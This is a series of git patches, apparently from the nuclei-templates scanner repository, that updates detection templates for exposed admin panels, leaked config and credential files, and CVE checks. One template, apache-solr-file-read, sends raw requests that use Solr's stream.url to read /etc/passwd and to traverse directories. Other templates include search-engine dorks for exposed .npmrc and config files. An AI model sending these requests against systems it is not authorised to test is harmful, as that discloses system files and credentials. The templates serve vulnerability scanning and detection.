07:37:34 +0000 Subject: [PATCH 0811/1415] Auto Generated New Template Addition List [Thu Dec 1 07:37:34 UTC 2022] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 89ac10f01d..c472cb905c 100644 --- a/.new-additions +++ b/.new-additions @@ -8,6 +8,7 @@ cves/2022/CVE-2022-25481.yaml cves/2022/CVE-2022-3506.yaml exposed-panels/asus-router-panel.yaml exposed-panels/cudatel-panel.yaml +exposed-panels/dradis-pro-panel.yaml exposed-panels/exolis-engage-panel.yaml exposed-panels/fastpanel-hosting-control-panel.yaml exposed-panels/locklizard-webviewer-panel.yaml @@ -33,6 +34,7 @@ technologies/aerocms-detect.yaml technologies/oracle-httpserver12c.yaml technologies/payara-micro-server-detect.yaml technologies/vbulletin-detect.yaml +technologies/workerman-websocket-detect.yaml token-spray/api-giphy.yaml vulnerabilities/other/inspur-clusterengine-rce.yaml vulnerabilities/wordpress/wptouch-xss.yaml From 9c51d8b0ae6793463c93dfc826a3a5a532a600ae Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Dec 2022 13:17:19 +0530 Subject: [PATCH 0813/1415] Update and rename backpack-admin-login.yaml to backpack-admin-panel.yaml --- ...pack-admin-login.yaml => backpack-admin-panel.yaml} | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) rename exposed-panels/backpack/{backpack-admin-login.yaml => backpack-admin-panel.yaml} (76%) diff --git a/exposed-panels/backpack/backpack-admin-login.yaml b/exposed-panels/backpack/backpack-admin-panel.yaml similarity index 76% rename from exposed-panels/backpack/backpack-admin-login.yaml rename to exposed-panels/backpack/backpack-admin-panel.yaml index d2dd28c4f8..e8efd17506 100644 --- a/exposed-panels/backpack/backpack-admin-login.yaml +++ b/exposed-panels/backpack/backpack-admin-panel.yaml @@ -1,7 +1,7 @@ -id: backpack-admin-login +id: backpack-admin-panel info: - name: Backpack Admin Login + name: Backpack Admin Login Panel author: shine severity: info description: | @@ -23,8 +23,4 @@ requests: words: - 'Backpack Admin' - 'backpack_alerts' - condition: and - - - type: status - status: - - 200 + condition: or From 0944da13e53fd08a30d664b7646e5aa4ce92ca8d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 1 Dec 2022 13:21:04 +0530 Subject: [PATCH 0814/1415] Update jetbrains-webservers.yaml --- exposures/files/jetbrains-webservers.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/jetbrains-webservers.yaml b/exposures/files/jetbrains-webservers.yaml index 171600663d..2cde843431 100644 --- a/exposures/files/jetbrains-webservers.yaml +++ b/exposures/files/jetbrains-webservers.yaml @@ -10,7 +10,7 @@ info: - https://www.exploit-db.com/ghdb/6648 metadata: verified: true - shodan-query: title:"Backpack Admin" + google-query: intitle:"index of" "WebServers.xml" tags: jetbrains,config,edb requests: From 8c384f079e470c65581fa2c53b2039f4e941afd2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 1 Dec 2022 13:23:04 +0530 Subject: [PATCH 0815/1415] Update cisco-webvpn-detect.yaml --- exposed-panels/cisco/cisco-webvpn-detect.yaml | 20 +++++++++++-------- 1 file changed, 12 insertions(+), 8 deletions(-) diff --git a/exposed-panels/cisco/cisco-webvpn-detect.yaml b/exposed-panels/cisco/cisco-webvpn-detect.yaml index 84077960c6..16ba323afb 100644 --- a/exposed-panels/cisco/cisco-webvpn-detect.yaml +++ b/exposed-panels/cisco/cisco-webvpn-detect.yaml @@ -1,36 +1,40 @@ id: cisco-webvpn-detect + info: - name: CISCO WebVPN detect + name: Cisco WebVPN Detect author: ricardomaia severity: info reference: - https://askanydifference.com/difference-between-cisco-clientless-ssl-vpn-and-anyconnect-with-table/ - tags: panel,cisco,vpn metadata: + verified: true fofa-query: fid="U1TP/SJklrT9VLIEpZkQNg==" google-query: intitle:"SSLVPN Service" + tags: panel,cisco,vpn requests: - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/webvpn.html" + redirects: true max-redirects: 2 stop-at-first-match: true matchers-condition: and - path: - - "{{BaseURL}}/webvpn.html" - - "{{BaseURL}}" matchers: - type: word - case-insensitive: true - condition: or part: body words: - "CISCO" - "AnyConnect" - "SSLVPN Service" + condition: or + case-insensitive: true + - type: regex part: header - condition: or regex: - "webvpncontext=00@.+" - "webvpn=" + condition: or From 39081703bdf256cfb767ed6227c8dc879b30bc1f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 08:50:02 +0000 Subject: [PATCH 0816/1415] Auto Generated New Template Addition List [Thu Dec 1 08:50:02 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c472cb905c..f34b21ff27 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ cves/2022/CVE-2022-1933.yaml cves/2022/CVE-2022-25481.yaml cves/2022/CVE-2022-3506.yaml exposed-panels/asus-router-panel.yaml +exposed-panels/backpack/backpack-admin-panel.yaml exposed-panels/cudatel-panel.yaml exposed-panels/dradis-pro-panel.yaml exposed-panels/exolis-engage-panel.yaml From 904a736c372902399ee07517d3e2a48b95e781fa Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 1 Dec 2022 15:18:43 +0530 Subject: [PATCH 0817/1415] Update and rename zyxel-router-login.yaml to zyxel-router-panel.yaml --- .../{zyxel-router-login.yaml => zyxel-router-panel.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename exposed-panels/{zyxel-router-login.yaml => zyxel-router-panel.yaml} (95%) diff --git a/exposed-panels/zyxel-router-login.yaml b/exposed-panels/zyxel-router-panel.yaml similarity index 95% rename from exposed-panels/zyxel-router-login.yaml rename to exposed-panels/zyxel-router-panel.yaml index fa5a08ffa9..7a7a2aeea3 100644 --- a/exposed-panels/zyxel-router-login.yaml +++ b/exposed-panels/zyxel-router-panel.yaml @@ -1,4 +1,4 @@ -id: zyxel-router-login +id: zyxel-router-panel info: name: ZyXel Router - Login Panel From 17dccf6dab202853bfbc12ecfe6ba5d4d92c9396 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 09:49:06 +0000 Subject: [PATCH 0818/1415] Auto Generated New Template Addition List [Thu Dec 1 09:49:06 UTC 2022] :robot: --- .new-additions | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.new-additions b/.new-additions index f34b21ff27..bd8dd9ecb4 100644 --- a/.new-additions +++ b/.new-additions @@ -18,7 +18,7 @@ exposed-panels/nuxeo-platform-panel.yaml exposed-panels/pega-web-panel.yaml exposed-panels/persis-panel.yaml exposed-panels/vodafone-voxui-panel.yaml -exposed-panels/zyxel-router-login.yaml +exposed-panels/zyxel-router-panel.yaml exposures/logs/ffserver-status.yaml misconfiguration/collectd-exporter-metrics.yaml misconfiguration/installer/oxid-eshop-installer.yaml From be9afa6eca28b28a573bbdcecfd59a920ebb7ba5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 11:29:58 +0000 Subject: [PATCH 0819/1415] Auto Generated New Template Addition List [Thu Dec 1 11:29:58 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index bd8dd9ecb4..340480b0a6 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ cves/2021/CVE-2021-43421.yaml cves/2022/CVE-2022-1883.yaml cves/2022/CVE-2022-1916.yaml cves/2022/CVE-2022-1933.yaml +cves/2022/CVE-2022-2034.yaml cves/2022/CVE-2022-25481.yaml cves/2022/CVE-2022-3506.yaml exposed-panels/asus-router-panel.yaml From 606363f0782aeeecfd73671e5fc7f54ececbe22d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 1 Dec 2022 17:11:30 +0530 Subject: [PATCH 0820/1415] Update riseup-panel.yaml --- exposed-panels/riseup-panel.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/exposed-panels/riseup-panel.yaml b/exposed-panels/riseup-panel.yaml index 6603cee57c..2c50c60ba4 100644 --- a/exposed-panels/riseup-panel.yaml +++ b/exposed-panels/riseup-panel.yaml @@ -23,7 +23,12 @@ requests: - "cfg.envRiseUp" - "imgresize.riseup.ai" - "content.riseup.ai" - condition: and + condition: or + + - type: word + part: body + words: + - "login-page" - type: status status: From f3f5e76b1fcc0166b90178d85495826227d721de Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 11:43:58 +0000 Subject: [PATCH 0821/1415] Auto Generated New Template Addition List [Thu Dec 1 11:43:58 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 340480b0a6..db90feca40 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ exposed-panels/mach-proweb-login.yaml exposed-panels/nuxeo-platform-panel.yaml exposed-panels/pega-web-panel.yaml exposed-panels/persis-panel.yaml +exposed-panels/riseup-panel.yaml exposed-panels/vodafone-voxui-panel.yaml exposed-panels/zyxel-router-panel.yaml exposures/logs/ffserver-status.yaml From 40fc3d231001da417a5640407ecb1761903fe18b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 1 Dec 2022 17:14:55 +0530 Subject: [PATCH 0822/1415] Rename versa-flexvnf-ui-default-login.yaml to versa-flexvnf-default-login.yaml --- ...vnf-ui-default-login.yaml => versa-flexvnf-default-login.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename default-logins/versa/{versa-flexvnf-ui-default-login.yaml => versa-flexvnf-default-login.yaml} (100%) diff --git a/default-logins/versa/versa-flexvnf-ui-default-login.yaml b/default-logins/versa/versa-flexvnf-default-login.yaml similarity index 100% rename from default-logins/versa/versa-flexvnf-ui-default-login.yaml rename to default-logins/versa/versa-flexvnf-default-login.yaml From 13a99e01b4240eb97bbcff07da0346dc3b8edddd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 11:45:00 +0000 Subject: [PATCH 0823/1415] Auto Generated CVE annotations [Thu Dec 1 11:45:00 UTC 2022] :robot: --- cves/2022/CVE-2022-2034.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-2034.yaml b/cves/2022/CVE-2022-2034.yaml index 4ae6e73690..39a3b636ec 100644 --- a/cves/2022/CVE-2022-2034.yaml +++ b/cves/2022/CVE-2022-2034.yaml @@ -12,10 +12,13 @@ info: - https://wordpress.org/plugins/sensei-lms/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2034 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 cve-id: CVE-2022-2034 + cwe-id: CWE-862 metadata: - verified: true - tags: cve,cve2022,wordpress,wp-plugin,wp,disclosure,sensei-lms,fuzz + verified: "true" + tags: wp,disclosure,wpscan,cve,cve2022,sensei-lms,fuzz,hackerone,wordpress,wp-plugin requests: - method: GET From 807e2fba6429056635127056a8962ab87a0d488e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 1 Dec 2022 17:16:23 +0530 Subject: [PATCH 0824/1415] Update versa-flexvnf-server.yaml --- technologies/versa-flexvnf-server.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/versa-flexvnf-server.yaml b/technologies/versa-flexvnf-server.yaml index dfe1f7070b..f63688b0cb 100644 --- a/technologies/versa-flexvnf-server.yaml +++ b/technologies/versa-flexvnf-server.yaml @@ -15,7 +15,7 @@ requests: path: - "{{BaseURL}}/&?=?" - redirects: true + host-redirects: true max-redirects: 2 matchers-condition: and matchers: From 5fa2d243a64bf671fff83dfe3b33161de4302033 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 11:49:46 +0000 Subject: [PATCH 0825/1415] Auto Generated New Template Addition List [Thu Dec 1 11:49:46 UTC 2022] :robot: --- .new-additions | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/.new-additions b/.new-additions index db90feca40..78b4b3aed7 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ cves/2022/CVE-2022-1933.yaml cves/2022/CVE-2022-2034.yaml cves/2022/CVE-2022-25481.yaml cves/2022/CVE-2022-3506.yaml +default-logins/versa/versa-flexvnf-default-login.yaml exposed-panels/asus-router-panel.yaml exposed-panels/backpack/backpack-admin-panel.yaml exposed-panels/cudatel-panel.yaml @@ -19,6 +20,8 @@ exposed-panels/nuxeo-platform-panel.yaml exposed-panels/pega-web-panel.yaml exposed-panels/persis-panel.yaml exposed-panels/riseup-panel.yaml +exposed-panels/versa/versa-director-login.yaml +exposed-panels/versa/versa-flexvnf-panel.yaml exposed-panels/vodafone-voxui-panel.yaml exposed-panels/zyxel-router-panel.yaml exposures/logs/ffserver-status.yaml @@ -37,6 +40,9 @@ technologies/aerocms-detect.yaml technologies/oracle-httpserver12c.yaml technologies/payara-micro-server-detect.yaml technologies/vbulletin-detect.yaml +technologies/versa-flexvnf-server.yaml +technologies/versa/versa-director-api.yaml +technologies/versa/versa-networks-detect.yaml technologies/workerman-websocket-detect.yaml token-spray/api-giphy.yaml vulnerabilities/other/inspur-clusterengine-rce.yaml From dd261b0fb5992771e1172a4409ef3499c7bec5b6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Dec 2022 23:06:53 +0530 Subject: [PATCH 0826/1415] Update jetbrains-webservers.yaml --- exposures/files/jetbrains-webservers.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/jetbrains-webservers.yaml b/exposures/files/jetbrains-webservers.yaml index 2cde843431..d73c1dc27e 100644 --- a/exposures/files/jetbrains-webservers.yaml +++ b/exposures/files/jetbrains-webservers.yaml @@ -3,7 +3,7 @@ id: jetbrains-webservers info: name: Jetbrains WebServers File Exposure author: geeknik - severity: low + severity: info description: | Created by Jetbrains IDEs, contains webserver credentials with encoded passwords. reference: From b204a382dcda61a3640c71deff3ac1cb1cacac20 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Dec 2022 23:14:42 +0530 Subject: [PATCH 0827/1415] Update CVE-2022-45933.yaml --- cves/2022/CVE-2022-45933.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2022/CVE-2022-45933.yaml b/cves/2022/CVE-2022-45933.yaml index a53ada93b9..03331cf381 100644 --- a/cves/2022/CVE-2022-45933.yaml +++ b/cves/2022/CVE-2022-45933.yaml @@ -9,6 +9,8 @@ info: reference: - https://github.com/benc-uk/kubeview/issues/95 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933 + classification: + cve-id: CVE-2022-45933 metadata: verified: true shodan-query: http.title:"KubeView" From 2167269cfab14688fcdcd71064e8ff7c942134c2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 17:45:31 +0000 Subject: [PATCH 0828/1415] Auto Generated New Template Addition List [Thu Dec 1 17:45:30 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 78b4b3aed7..e940d36377 100644 --- a/.new-additions +++ b/.new-additions @@ -24,6 +24,7 @@ exposed-panels/versa/versa-director-login.yaml exposed-panels/versa/versa-flexvnf-panel.yaml exposed-panels/vodafone-voxui-panel.yaml exposed-panels/zyxel-router-panel.yaml +exposures/files/jetbrains-webservers.yaml exposures/logs/ffserver-status.yaml misconfiguration/collectd-exporter-metrics.yaml misconfiguration/installer/oxid-eshop-installer.yaml From 8f9b1ce7e949ac10e12f4091f91020a63edac388 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 17:47:58 +0000 Subject: [PATCH 0829/1415] Auto Generated New Template Addition List [Thu Dec 1 17:47:58 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e940d36377..da0bf050e4 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ cves/2022/CVE-2022-1933.yaml cves/2022/CVE-2022-2034.yaml cves/2022/CVE-2022-25481.yaml cves/2022/CVE-2022-3506.yaml +cves/2022/CVE-2022-45933.yaml default-logins/versa/versa-flexvnf-default-login.yaml exposed-panels/asus-router-panel.yaml exposed-panels/backpack/backpack-admin-panel.yaml From 7fd6adc524ae6ac6dfb36436a5aeb1dfacda8cde Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Dec 2022 23:29:39 +0530 Subject: [PATCH 0830/1415] Update and rename sftp-config.yaml to sftp-config-exposure.yaml --- .../configs/{sftp-config.yaml => sftp-config-exposure.yaml} | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) rename exposures/configs/{sftp-config.yaml => sftp-config-exposure.yaml} (89%) diff --git a/exposures/configs/sftp-config.yaml b/exposures/configs/sftp-config-exposure.yaml similarity index 89% rename from exposures/configs/sftp-config.yaml rename to exposures/configs/sftp-config-exposure.yaml index 13274c7352..6d3e3c5db0 100644 --- a/exposures/configs/sftp-config.yaml +++ b/exposures/configs/sftp-config-exposure.yaml @@ -1,4 +1,4 @@ -id: sftp-config +id: sftp-config-exposure info: name: SFTP Config File Disclosure @@ -24,7 +24,8 @@ requests: words: - '"host":' - '"user":' - - 'password":' + - '"password":' + - '"remote_path":' condition: and - type: status From bcb9e7206fc992af319597bb41746a2bd0e86d7e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 18:01:40 +0000 Subject: [PATCH 0831/1415] Auto Generated New Template Addition List [Thu Dec 1 18:01:39 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index da0bf050e4..bcc7bf41d6 100644 --- a/.new-additions +++ b/.new-additions @@ -25,6 +25,7 @@ exposed-panels/versa/versa-director-login.yaml exposed-panels/versa/versa-flexvnf-panel.yaml exposed-panels/vodafone-voxui-panel.yaml exposed-panels/zyxel-router-panel.yaml +exposures/configs/sftp-config-exposure.yaml exposures/files/jetbrains-webservers.yaml exposures/logs/ffserver-status.yaml misconfiguration/collectd-exporter-metrics.yaml From d606be6c01caedfab15eee06728d2ad6ba11a09c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Dec 2022 23:35:21 +0530 Subject: [PATCH 0832/1415] Update sftp-deployment-config.yaml --- exposures/configs/sftp-deployment-config.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/exposures/configs/sftp-deployment-config.yaml b/exposures/configs/sftp-deployment-config.yaml index 7dd27c64c0..2d1ea3b4a6 100644 --- a/exposures/configs/sftp-deployment-config.yaml +++ b/exposures/configs/sftp-deployment-config.yaml @@ -22,9 +22,10 @@ requests: matchers: - type: word words: - - "host" - - "username" - - "password" + - '"host":' + - '"username":' + - '"password":' + - '"remotePath":' condition: and - type: status From 45aa7c3c5c35ccdc9bd2dcc4c41b083ea2163ebc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 18:41:11 +0000 Subject: [PATCH 0833/1415] Auto Generated New Template Addition List [Thu Dec 1 18:41:11 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index bcc7bf41d6..cd9f6d5d10 100644 --- a/.new-additions +++ b/.new-additions @@ -26,6 +26,7 @@ exposed-panels/versa/versa-flexvnf-panel.yaml exposed-panels/vodafone-voxui-panel.yaml exposed-panels/zyxel-router-panel.yaml exposures/configs/sftp-config-exposure.yaml +exposures/configs/sftp-deployment-config.yaml exposures/files/jetbrains-webservers.yaml exposures/logs/ffserver-status.yaml misconfiguration/collectd-exporter-metrics.yaml From 9a37eb810bf8c7a458f9b4c5566fed29842a9b46 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 2 Dec 2022 00:14:53 +0530 Subject: [PATCH 0834/1415] Update npmrc-authtoken.yaml --- exposures/files/npmrc-authtoken.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/npmrc-authtoken.yaml b/exposures/files/npmrc-authtoken.yaml index 2730770673..7b17ad926d 100644 --- a/exposures/files/npmrc-authtoken.yaml +++ b/exposures/files/npmrc-authtoken.yaml @@ -1,7 +1,7 @@ id: npmrc-authtoken info: - name: Hardcoded .npmrc authToken + name: Hardcoded .npmrc AuthToken author: geeknik severity: high reference: From baed6fb6f3f7c08ae56b60bd967fdc77c8d0185e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 2 Dec 2022 00:39:57 +0530 Subject: [PATCH 0835/1415] Update npmrc-authtoken.yaml --- exposures/files/npmrc-authtoken.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposures/files/npmrc-authtoken.yaml b/exposures/files/npmrc-authtoken.yaml index 7b17ad926d..d573b8c253 100644 --- a/exposures/files/npmrc-authtoken.yaml +++ b/exposures/files/npmrc-authtoken.yaml @@ -9,6 +9,7 @@ info: - https://docs.github.com/en/packages/working-with-a-github-packages-registry/working-with-the-npm-registry metadata: verified: true + google-dork: intitle:"index of" ".npmrc" tags: npm,exposure requests: @@ -21,6 +22,8 @@ requests: - type: word words: - "_authToken=" + - "_auth=" + condition: or - type: status status: From ddadc1c220ebbdd1d9a28fb3acdcc6d5a2937a76 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 2 Dec 2022 00:44:20 +0530 Subject: [PATCH 0836/1415] Update openstack-user-secrets.yaml --- exposures/files/openstack-user-secrets.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/openstack-user-secrets.yaml b/exposures/files/openstack-user-secrets.yaml index f5f20c7962..eb3f829ca7 100644 --- a/exposures/files/openstack-user-secrets.yaml +++ b/exposures/files/openstack-user-secrets.yaml @@ -23,7 +23,7 @@ requests: - type: word part: body words: - - "WARNING" + - "_password:" - "OpenStack environment" condition: and From 4d0247a3d2f692788cc287b8aa13418b11ed9fbb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 19:15:02 +0000 Subject: [PATCH 0837/1415] Auto Generated New Template Addition List [Thu Dec 1 19:15:02 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cd9f6d5d10..cbeb746dab 100644 --- a/.new-additions +++ b/.new-additions @@ -28,6 +28,7 @@ exposed-panels/zyxel-router-panel.yaml exposures/configs/sftp-config-exposure.yaml exposures/configs/sftp-deployment-config.yaml exposures/files/jetbrains-webservers.yaml +exposures/files/npmrc-authtoken.yaml exposures/logs/ffserver-status.yaml misconfiguration/collectd-exporter-metrics.yaml misconfiguration/installer/oxid-eshop-installer.yaml From 997978f151f25cecd7f84b10166c03147e622609 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 19:16:51 +0000 Subject: [PATCH 0838/1415] Auto Generated New Template Addition List [Thu Dec 1 19:16:51 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cbeb746dab..d86d7afc71 100644 --- a/.new-additions +++ b/.new-additions @@ -29,6 +29,7 @@ exposures/configs/sftp-config-exposure.yaml exposures/configs/sftp-deployment-config.yaml exposures/files/jetbrains-webservers.yaml exposures/files/npmrc-authtoken.yaml +exposures/files/openstack-user-secrets.yaml exposures/logs/ffserver-status.yaml misconfiguration/collectd-exporter-metrics.yaml misconfiguration/installer/oxid-eshop-installer.yaml From ffe535e907403e1d6d848ea15e509cc4edd8a319 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 2 Dec 2022 00:59:33 +0530 Subject: [PATCH 0840/1415] Update cisco-webvpn-detect.yaml --- exposed-panels/cisco/cisco-webvpn-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/cisco/cisco-webvpn-detect.yaml b/exposed-panels/cisco/cisco-webvpn-detect.yaml index 16ba323afb..bf99b9b8b5 100644 --- a/exposed-panels/cisco/cisco-webvpn-detect.yaml +++ b/exposed-panels/cisco/cisco-webvpn-detect.yaml @@ -18,7 +18,7 @@ requests: - "{{BaseURL}}" - "{{BaseURL}}/webvpn.html" - redirects: true + host-redirects: true max-redirects: 2 stop-at-first-match: true matchers-condition: and From edc1677215a39dd7d29ab1d185e43fe5ecb0d361 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 19:35:23 +0000 Subject: [PATCH 0841/1415] Auto Generated New Template Addition List [Thu Dec 1 19:35:23 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d86d7afc71..de1dd92d83 100644 --- a/.new-additions +++ b/.new-additions @@ -11,6 +11,7 @@ cves/2022/CVE-2022-45933.yaml default-logins/versa/versa-flexvnf-default-login.yaml exposed-panels/asus-router-panel.yaml exposed-panels/backpack/backpack-admin-panel.yaml +exposed-panels/cisco/cisco-webvpn-detect.yaml exposed-panels/cudatel-panel.yaml exposed-panels/dradis-pro-panel.yaml exposed-panels/exolis-engage-panel.yaml From 6242d0d1260f38a5e2b9209567c1000f3550b87f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 20:27:25 +0000 Subject: [PATCH 0843/1415] Auto Generated New Template Addition List [Thu Dec 1 20:27:25 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index de1dd92d83..eb83e8c5f5 100644 --- a/.new-additions +++ b/.new-additions @@ -28,6 +28,7 @@ exposed-panels/vodafone-voxui-panel.yaml exposed-panels/zyxel-router-panel.yaml exposures/configs/sftp-config-exposure.yaml exposures/configs/sftp-deployment-config.yaml +exposures/files/dbeaver-database-connections.yaml exposures/files/jetbrains-webservers.yaml exposures/files/npmrc-authtoken.yaml exposures/files/openstack-user-secrets.yaml From 843264155b58ddf47485d8d5f7fb8d9ba5e5cd3b Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 1 Dec 2022 18:51:21 -0500 Subject: [PATCH 0844/1415] Update apache-solr-file-read.yaml 1. The added GET request triggers a file local read on Windows OS. 2. Matcher added to the Response trigger by 1. 3. Matcher for other cases (Errors, ie. not found path) --- .../apache/apache-solr-file-read.yaml | 27 ++++++++++++++----- 1 file changed, 20 insertions(+), 7 deletions(-) diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index ccb3629709..6ccddb4c27 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -2,7 +2,7 @@ id: apache-solr-file-read info: name: Apache Solr <= 8.8.1 - Local File Inclusion - author: DhiyaneshDk + author: DhiyaneshDk, philippedelteil severity: high description: Apache Solr versions prior to and including 8.8.1 are vulnerable to local file inclusion. reference: @@ -22,6 +22,12 @@ requests: Host: {{Hostname}} Accept-Language: en Connection: close + + - | + GET /solr/{{core}}/debug/dump?stream.url=file:///../../../../../¶m=ContentStream HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close - | GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 @@ -37,14 +43,21 @@ requests: regex: - '"name"\:"(.*?)"' - matchers-condition: and matchers: - - type: status - status: - - 200 - + - type: word + name: "Windows" + words: + - "Windows" + - "Users" + - "org.apache.solr.handler.DumpRequestHandler" + condition: and - type: regex + name: "Linux" regex: - "root:.*:0:0:" - + - type: word + name: "Other" + words: + - "java.io.FileNotFoundException" + # Enhanced by mp on 2022/07/22 From a37abb440183e432ad578cf22a72d969d9e6cacf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 09:12:05 +0530 Subject: [PATCH 0845/1415] Update apache-solr-file-read.yaml --- vulnerabilities/apache/apache-solr-file-read.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index 6ccddb4c27..8b437ea797 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -22,7 +22,7 @@ requests: Host: {{Hostname}} Accept-Language: en Connection: close - + - | GET /solr/{{core}}/debug/dump?stream.url=file:///../../../../../¶m=ContentStream HTTP/1.1 Host: {{Hostname}} @@ -51,13 +51,13 @@ requests: - "Users" - "org.apache.solr.handler.DumpRequestHandler" condition: and + - type: regex name: "Linux" regex: - "root:.*:0:0:" + - type: word name: "Other" words: - "java.io.FileNotFoundException" - -# Enhanced by mp on 2022/07/22 From 0384b0d51d88a51a0000a20df31808045c328b92 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 09:13:23 +0530 Subject: [PATCH 0846/1415] Update apache-solr-file-read.yaml --- vulnerabilities/apache/apache-solr-file-read.yaml | 2 +- 1 file changed, 1 insertion(+), 1 